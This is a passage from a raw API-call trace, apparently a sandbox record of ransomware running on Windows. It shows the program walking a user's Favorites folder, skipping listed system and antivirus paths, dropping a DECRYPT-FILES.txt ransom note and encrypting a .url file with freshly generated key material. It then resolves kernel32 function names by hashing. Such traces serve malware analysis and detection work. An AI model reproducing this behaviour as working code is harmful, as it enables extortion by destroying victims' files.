out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0085.153] lstrcmpW (lpString1="Windows Live", lpString2=".") returned 1 [0085.153] lstrcmpW (lpString1="Windows Live", lpString2="..") returned 1 [0085.153] lstrcatW (in: lpString1="Windows Live", lpString2="\\" | out: lpString1="Windows Live\\") returned="Windows Live\\" [0085.154] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0085.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\Program Files") returned 0x0 [0085.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch=":\\Windows") returned 0x0 [0085.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\Games\\") returned 0x0 [0085.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\All Users") returned 0x0 [0085.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\Local Settings\\") returned 0x0 [0085.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\AppData\\Local") returned 0x0 [0085.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="AhnLab") returned 0x0 [0085.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0085.154] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0085.154] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.154] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\\\jkbimi8.tmp") returned 65 [0085.154] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0085.156] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0085.156] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0085.156] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\\\DECRYPT-FILES.txt") returned 71 [0085.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0085.163] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0085.164] CloseHandle (hObject=0x414) returned 1 [0085.164] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0085.165] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*" [0085.165] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaef53c80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaef53c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0085.165] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.165] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaef53c80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaef53c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.165] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.165] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.165] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef2db20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaef2db20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaef53c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0085.165] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0085.165] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0085.165] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.165] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="autorun.inf") returned 1 [0085.165] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="boot.ini") returned 1 [0085.165] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="desktop.ini") returned 1 [0085.165] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="ntuser.dat") returned -1 [0085.165] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="iconcache.db") returned -1 [0085.165] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="bootsect.bak") returned 1 [0085.165] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="ntuser.dat.log") returned -1 [0085.165] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="thumbs.db") returned -1 [0085.165] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="Bootfont.bin") returned 1 [0085.165] lstrlenW (lpString="Get Windows Live.url") returned 20 [0085.165] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.165] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.165] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.165] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.165] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0085.165] lstrlenW (lpString="Get Windows Live.url") returned 20 [0085.165] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0085.165] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="Get Windows Live.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" [0085.165] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.166] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.167] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=133) returned 1 [0085.167] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.167] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.167] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.167] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.167] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.169] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.169] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.169] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.170] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.170] CloseHandle (hObject=0x42c) returned 1 [0085.170] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.170] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.171] CloseHandle (hObject=0x0) returned 0 [0085.171] CloseHandle (hObject=0x428) returned 1 [0085.171] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.171] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.171] GetTickCount () returned 0x114dbfe [0085.171] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.172] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.172] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.172] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.172] lstrlenA (lpString="kernel32.dll") returned 12 [0085.172] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.172] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.173] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.173] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.173] lstrlenA (lpString="ADDATOMA") returned 8 [0085.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.173] lstrlenA (lpString="ADDATOMW") returned 8 [0085.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.173] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.173] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.173] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.173] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.173] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.173] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.173] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.173] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.173] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.173] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.173] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.174] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.174] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.174] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.174] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.174] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.174] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.174] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.174] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.174] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.174] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.174] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.174] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.174] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.174] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.174] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.174] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.174] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.174] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.175] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.175] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.175] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.175] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.175] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.175] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.175] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.175] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.175] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.175] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.175] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.175] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.175] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.175] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.175] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.175] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.175] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.176] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.176] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.176] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.176] lstrlenA (lpString="BEEP") returned 4 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.176] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.176] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.176] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.176] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, 